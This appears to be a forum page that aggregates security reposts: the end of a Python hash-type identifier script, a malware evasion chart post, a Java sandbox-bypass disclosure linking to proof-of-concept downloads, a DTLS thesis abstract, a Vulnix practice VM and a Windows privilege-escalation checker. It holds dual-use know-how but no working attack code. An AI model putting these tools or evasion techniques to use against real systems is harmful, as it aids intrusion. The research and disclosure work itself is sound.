hash.isalnum()==True: jerar.append("106480") def md5md5pass(): hs='a96103d267d024583d5565436e52dfb3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106500") def md5md5passsalt(): hs='5848c73c2482d3c2c7b6af134ed8dd89' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106520") def md5md5passmd5salt(): hs='8dc71ef37197b2edba02d48c30217b32' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106540") def md5md5saltpass(): hs='9032fabd905e273b9ceb1e124631bd67' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106560") def md5md5saltmd5pass(): hs='8966f37dbb4aca377a71a9d3d09cd1ac' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106580") def md5md5usernamepasssalt(): hs='4319a3befce729b34c3105dbc29d0c40' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106600") def md5md5md5pass(): hs='ea086739755920e732d0f4d8c1b6ad8d' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106620") def md5md5md5md5pass(): hs='02528c1f2ed8ac7d83fe76f3cf1c133f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106640") def md5md5md5md5md5pass(): hs='4548d2c062933dff53928fd4ae427fc0' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106660") def md5sha1pass(): hs='cb4ebaaedfd536d965c452d9569a6b1e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106680") def md5sha1md5pass(): hs='099b8a59795e07c334a696a10c0ebce0' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106700") def md5sha1md5sha1pass(): hs='06e4af76833da7cc138d90602ef80070' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106720") def md5strtouppermd5pass(): hs='519de146f1a658ab5e5e2aa9b7d2eec8' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106740") def LineageIIC4(): hs='0x49a57f66bd3d5ba6abda5579c264a0e4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: jerar.append("107080") def MD5phpBB3(): hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: jerar.append("107040") def MD5Unix(): hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: jerar.append("107060") def MD5Wordpress(): hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: jerar.append("107020") def MD5APR(): hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: jerar.append("108020") def Haval160(): hs='a106e921284dd69dad06192a4411ec32fce83dbb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109100") def Haval160HMAC(): hs='29206f83edc1d6c3f680ff11276ec20642881243' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109200") def MySQL5(): hs='9bb2fb57063821c762cc009f7584ddae9da431ff' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109040") def MySQL160bit(): hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: jerar.append("109060") def RipeMD160(): hs='dc65552812c66997ea7320ddfb51f5625d74721b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109120") def RipeMD160HMAC(): hs='ca28af47653b4f21e96c1235984cb50229331359' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109180") def SHA1(): hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109020") def SHA1HMAC(): hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109140") def SHA1MaNGOS(): hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109220") def SHA1MaNGOS2(): hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109240") def Tiger160(): hs='c086184486ec6388ff81ec9f235287270429b225' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109080") def Tiger160HMAC(): hs='6603161719da5e56e1866e4f61f79496334e6a10' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109160") def sha1passsalt(): hs='f006a1863663c21c541c8d600355abfeeaadb5e4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109260") def sha1saltpass(): hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109280") def sha1saltmd5pass(): hs='860465ede0625deebb4fbbedcb0db9dc65faec30' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109300") def sha1saltmd5passsalt(): hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109320") def sha1saltsha1pass(): hs='58714327f9407097c64032a2fd5bff3a260cb85f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109340") def sha1saltsha1saltsha1pass(): hs='cc600a2903130c945aa178396910135cc7f93c63' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109360") def sha1usernamepass(): hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109380") def sha1usernamepasssalt(): hs='00025111b3c4d0ac1635558ce2393f77e94770c5' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109400") def sha1md5pass(): hs='fa960056c0dea57de94776d3759fb555a15cae87' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("1094202") def sha1md5passsalt(): hs='1dad2b71432d83312e61d25aeb627593295bcc9a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109440") def sha1md5sha1pass(): hs='8bceaeed74c17571c15cdb9494e992db3c263695' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109460") def sha1sha1pass(): hs='3109b810188fcde0900f9907d2ebcaa10277d10e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109480") def sha1sha1passsalt(): hs='780d43fa11693b61875321b6b54905ee488d7760' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109500") def sha1sha1passsubstrpass03(): hs='5ed6bc680b59c580db4a38df307bd4621759324e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109520") def sha1sha1saltpass(): hs='70506bac605485b4143ca114cbd4a3580d76a413' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109540") def sha1sha1sha1pass(): hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109560") def sha1strtolowerusernamepass(): hs='79f575543061e158c2da3799f999eb7c95261f07' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109580") def Haval192(): hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110040") def Haval192HMAC(): hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110080") def Tiger192(): hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110020") def Tiger192HMAC(): hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110060") def MD5passsaltjoomla1(): hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: jerar.append("112020") def SHA1Django(): hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: jerar.append("113020") def Haval224(): hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114040") def Haval224HMAC(): hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114080") def SHA224(): hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114020") def SHA224HMAC(): hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114060") def SHA256(): hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115020") def SHA256HMAC(): hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115120") def Haval256(): hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115040") def Haval256HMAC(): hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115140") def GOSTR341194(): hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115060") def RipeMD256(): hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115080") def RipeMD256HMAC(): hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115160") def SNEFRU256(): hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115100") def SNEFRU256HMAC(): hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115180") def SHA256md5pass(): hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115200") def SHA256sha1pass(): hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115220") def MD5passsaltjoomla2(): hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: jerar.append("116020") def SAM(): hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: jerar.append("116040") def SHA256Django(): hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: jerar.append("117020") def RipeMD320(): hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("118020") def RipeMD320HMAC(): hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("118040") def SHA384(): hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("119020") def SHA384HMAC(): hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("119040") def SHA256s(): hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: jerar.append("120020") def SHA384Django(): hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: print " [+] SHA-384(Django)" jerar.append("121020") def SHA512(): hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122020") def SHA512HMAC(): hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122060") def Whirlpool(): hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122040") def WhirlpoolHMAC(): hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122080") print logo while True: jerar=[] print """ -------------------------------------------------------------------------""" hash = raw_input(" HASH: ") ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() if len(jerar)==0: print "" print " Not Found." elif len(jerar)>2: jerar.sort() print "" print "Possible Hashs:" print "[+] ",algorithms[jerar[0]] print "[+] ",algorithms[jerar[1]] print "" print "Least Possible Hashs:" for a in range(int(len(jerar))-2): print "[+] ",algorithms[jerar[a+2]] else: jerar.sort() print "" print "Possible Hashs:" for a in range(len(jerar)): print "[+] ",algorithms[jerar[a]] Posted by Marco Ramilli at 3:39 AM Sursa: Marco Ramilli's Blog: Hash Detector Tool

[h=2]Malware Evasion Chart[/h] Plenty of documents are describing how Malwares implement "Escape" techniques in order to evade Malware analysis. I did write posts on several of the most interesting evasion techniques ( available here and here) adding information on my side as well. Today I want to share a personal MAP that I made to correlate evasion techniques to detection techniques. It helped me a lot during some of my past talks as well as during my (research) malware writing nights. Aims of the following MAP is to correlate evasion techniques to detection techniques without preteding to be "cool/graphically appealing" or "complete". It wants to be "remind me what happens there". [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Malware Evasion Chart 101 (Download PDF)[/TD] [/TR] [/TABLE] The "soul" of the entire chart is stright int the center. Highlighted in blue shape the Analysis techniques. Highlighted in red shape the corresponding evasion techniques. In separate colored boxes significant examples of evasion techniques (again, there are many many many other ways to perform debugging traps/Red Pills/etc../etc... this wants to be only a "remind"). A glimpse of content: All the detection techniques could be clustered into two big groups: "Static Analisys" and "Dynamic Analysis". The Static analysis could be divided into "Signature" based techniques and "Decompiling" based techniques. The first set of techniques are based on signature matching. A signature is a set of bytes (not adjacent). The second set of techniques, look into binaries trying to understand behavior without running the binary on its own. These techniques are quite useful on pieces of data junk or not executable data. On the other side "dynamic analysis" where the analyst run the Malware. These techniques could be divided into "System Centric" and "Program Centric". The main difference between such techniques is the perspective. If you analyse the binary from inside you are "Program Centric" and so you might debug the bnary and/or look for internal API calls. If you are analyzing the binary from outside you are "System Centric" and you probably are sandboxing the binary. In the example boxes you find significative pieces of code and/or softwares that are used to achieve the evasion technique. For instance in the green box named "Code not run" PEditor shows how to modify the OEP (Original Entry Point) of a program to run unaligned code. In the box named "Breaking/watching/Catching point handlers" one of the most famous signal handlers have been shown and so forth and so on. If you find the MAP usefull, please leave a comment, if you'd like to expand it please send me an email I'd like to receive help in expanding it. Hope you'll enjoy. Sursa: Marco Ramilli's Blog: Malware Evasion Chart

[sE-2012-01] New Reflection API affected by a known 10+ years old attack From: Security Explorations <contact () security-explorations com> Date: Thu, 18 Jul 2013 06:50:30 +0200 Hello All, We discovered yet another indication that new Reflection API introduced into Java SE 7 was not a subject to a thorough security review (if any). A new vulnerability (Issue 69) that was submitted to Oracle today makes it possible to implement a very classic attack against Java VM. What's in particular interesting is that the attack itself has been in the public knowledge for at least 10+ years [1]. It's one of those risks one should protect against in the first place when new features are added to Java at the core VM level. The more surprising it is to discover that Reflection API introduced to Java SE 7 didn’t implement proper protection against this attack. Our Proof of Concept code for Issue 69 was confirmed to work with flying colors under Java SE 7 Update 25 (1.7.0_25-b16) and below. The code allows to violate a fundamental feature of Java VM security - the safety of its type system. As a result, a complete and reliable Java security sandbox bypass can be gained on a vulnerable instance of Oracle's Java SE software. Oracle's blog post published on May 30, 2013 [2] implies that maintaining the security-worthiness of Java has been Oracle’s priority following the acquisition of Sun Microsystems. Oracle's VP goes even further by indicating that "acquired product lines [such as Java SE] were required to conform to Oracle policies and procedures, including those comprising Oracle Software Security Assurance" [3]. If Oracle had any Software Security Assurance procedures adopted for Java SE, most of simple Reflection API flaws along with a known, 10+ years old attack should have been eliminated prior to Java SE 7 release. This didn't happen, thus it is reasonable to assume that Oracle's security policies and procedures are either not worth much or their implementation is far from perfect. That thought alone should catch attention of Oracle customers not necessarily relying on Java SE, but rather on other Oracle products, which were likely the subject to the very same, questionable Software Security Assurance policies and procedures as Java SE 7. -- As for other things, we released technical details and Proof of Concept code for a previously reported security vulnerability (Issue 61) that got fixed by Oracle's Java SE CPU in Jun 2013: http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf http://www.security-explorations.com/materials/se-2012-01-61.zip We also released technical details and Proof of Concept codes for several (9 in total) IBM Java flaws that were addressed by the company in early Jul 2013: http://www.security-explorations.com/materials/SE-2012-01-IBM-2.pdf http://www.security-explorations.com/materials/se-2012-01-62-68.zip The above includes details of trivially broken fixes for vulnerabilities reported to IBM in Sep 2012 (Issues 35-37 and 49). One of the issues is also a nice illustration of the "allowed behavior" (Issue 54) for other than Oracle's Java VM implementations. Finally, we published information (and some comment) about CVE numbers assigned by Oracle to vulnerabilities reported by Security Explorations as part of SE-2012-01 project: http://www.security-explorations.com/materials/SE-2012-01-CVE_Map.pdf Thank you. Best Regards Adam Gowdiak --------------------------------------------- Security Explorations Security Explorations "We bring security research to the new level" --------------------------------------------- References: [1] Java and Java VM security vulnerabilities and their exploitation techniques, Last Stage of Delirium Research Group, Welcome to LSD-PLaNET [2] Maintaining the security-worthiness of Java is Oracle’s priority https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of [3] Oracle Software Security Assurance Importance of Software Security Assurance _______________________________________________ Full-Disclosure - We believe in it. Charter: [Full-Disclosure] Mailing List Charter Hosted and sponsored by Secunia - Computer Security - Software & Alerts - Secunia Sursa: Full Disclosure: [sE-2012-01] New Reflection API affected by a known 10+ years old attack

Implementation and Evaluation of Datagram Transport Layer Security (DTLS) for the Android Operating System Master's Degree Project Stockholm, Sweden June 2012 Abstract Smartphones are nowadays a tool that everyone posses. With the replace- ment of the IPv4 with the IPv6 it is possible to connect to the Internet an ex- tremely large number of electronic devices. Those two factors are the premises to use smartphones to access those devices over a hybrid network, composed of Wireless Sensor Networks, IPv6-based Internet of Things, constrained networks and the conventional Internet. Some of these networks are very lossy and use the UDP protocol, hence the most suitable protocol to access resources is CoAP, a connection-less variant of the HTTP protocol, standardized as web protocol for the Internet of Things. The sensitivity of information and the Machine-to- Machine interaction as well as the presence of humans make the End-to-End security one of the requirements of the IPv6 Internet of Things. Secure CoAP (CoAPS) provide security for the CoAP protocol in this context. In this thesis secure CoAP for Android smartphones is designed implemented and evaluated, which is at the moment the rst work that enables CoAPS for smartphones. All the cryptographic cipher suites proposed in the CoAP protocol, among which the pre-shared key and certicate-based authentications are implemented, using the Elliptic Curve Cryptography and the AES algorithm in the CCM mode. The feasibility of this implementation is evaluated on a Nexus phone, which takes the handshake time in order to exchange parameters to secure the con- nection to about ve seconds, and an increase from one to three seconds of the DTLS retransmission timer. A part for this initial delays the performances us- ing secure CoAP are comparable to the performances obtained using the same protocol without security. The implementation allows also to secure the UDP transport thanks to the DTLS implementation, allowing any potential applica- tion to exchange secure data and have mutual authentication. Download: http://t.co/BFQbAeNWn4

Vulnerabilities in Full/Virtual Disk Encryption Products Neil Kettle neil/mu-b@digit-labs.org - digit-labs.org neil@digit-security.com - Digit Security Ltd SEC-T ’10 OUTLINE AGENDA FAQ FAQ - Why Bother? FAQ - Why BotherWith Drivers? Random Info DISCLAIMER PRODUCTS & VULNERABILITIES Generic Driver Design Products & Vulnerabilities Vulnerability Matrix CONCLUSIONS REFERENCES Download: http://www.digit-labs.org/files/presentations/sec-t-2010.pdf

[h=2]Vulnix (Vulnerable Linux) Release 1.0 [/h] Posted on September 10, 2012 by owen Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!) The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. The details are as follows: Architecture: x86 Format: VMware (vmx & vmdk) compatibility with version 4 onwards RAM: 512MB Network: NAT Extracted size: 820MB Compressed (download size): 194MB – 7zip format – 7zip can be obtained from here MD5 Hash of Vulnix.7z: 0bf19d11836f72d22f30bf52cd585757 - Download Vulnix from HERE - The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk Free free to contact me with any questions/comments using the comments section below. Enjoy! Sursa: Vulnix (Vulnerable Linux) Release 1.0 - Rebootuser Solutii: Vulnix (release 1.0) Solutions - Rebootuser

[h=1]windows-privesc-check[/h] A long time ago, I started writing a tool to look for local privilege escalation vectors on Windows systems – e.g. weak permissions on files, directories, service registy keys. I never quite got round to finishing it, but the project could still be useful to pentesters and auditors in its current part-finished state. I’d suggest giving it a try next time you do a security audit with local administrator rights, or next time you get a non-admin logon to a Windows system during a pentest. It was designed to be useful for both. Trunk contains the best all-round version. It checks some file, directory, registry and service permissions (among other things). Reports are in HTML. The newer wpc-2.0 branch does a better job at auditing Windows services – but does little else. Reports are in text only. You only need to download the .exe file. Full source code is available too, though. It’s written in Python, uses pywin32 and “compiled” with pyinstaller. You don’t need to download any dependencies (even python) unless you’re planning to build the .exe yourself. [h=2]FAQ[/h] [h=3]Why 2 versions?[/h] The code in “trunk” wasn’t object-oriented, making it harder to work with. I rewrote it to create the “wpc-2.0? branch. Much better – but alas, not finished. [h=3]Can I see the source code?[/h] Yes, it’s on google code along with the executables. [h=3]Will the program elevate privileges for me?[/h] No. It gives you a report describing any potential vulnerabilities it finds, but doesn’t have any autopwn features. This is mostly to reduce the risk of my code accidentally breaking your client’s system Sursa: windows-privesc-check | pentestmonkey

